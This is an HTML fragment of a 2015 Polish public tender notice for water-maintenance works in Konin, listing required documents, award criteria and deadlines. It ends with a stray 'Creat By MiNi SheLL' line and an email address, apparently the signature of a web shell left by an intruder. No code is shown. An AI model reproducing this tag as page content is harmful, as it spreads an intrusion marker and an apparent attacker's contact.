<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Wypełniony formularz oferty wraz z kosztorysem ofertowym sporządzonym zgodnie z opisem sposobu obliczania ceny oferty
- upoważnienie Wykonawcy do podpisywania ofert i podejmowania zobowiązań w imieniu Wykonawcy, o ile nie wynika ono z dokumentów zawartych w ofercie (oryginał)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 75</li>
<li>2 - Okres realizacji zamówienia - 25</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość wprowadzenia istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w zakresie:

1. Zmiany umownego terminu realizacji robót w przypadku wystąpienia niekorzystnych warunków atmosferyczno-hydrologicznych, uniemożliwiających wykonywanie prac utrzymaniowych przez okres dłuższy niż 14 dni. Przedłużenie terminu realizacji robót może nastąpić, po uzgodnieniu z zamawiającym maksymalnie o okres zaistniałych niekorzystnych warunków.
2. Wystąpienia robót zamiennych, dodatkowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wzmiuw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielkopolski Zarząd Melioracji i Urządzeń Wodnych w Poznaniu Rejonowy Oddział w Koninie, ul. Okólna 59, 62-510 KONIN, pokój nr 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.09.2015 godzina 09:00, miejsce: Wielkopolski Zarząd Melioracji i Urządzeń Wodnych w Poznaniu Rejonowy Oddział w Koninie, ul. Okólna 59, 62-510 KONIN, pokój nr 10 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com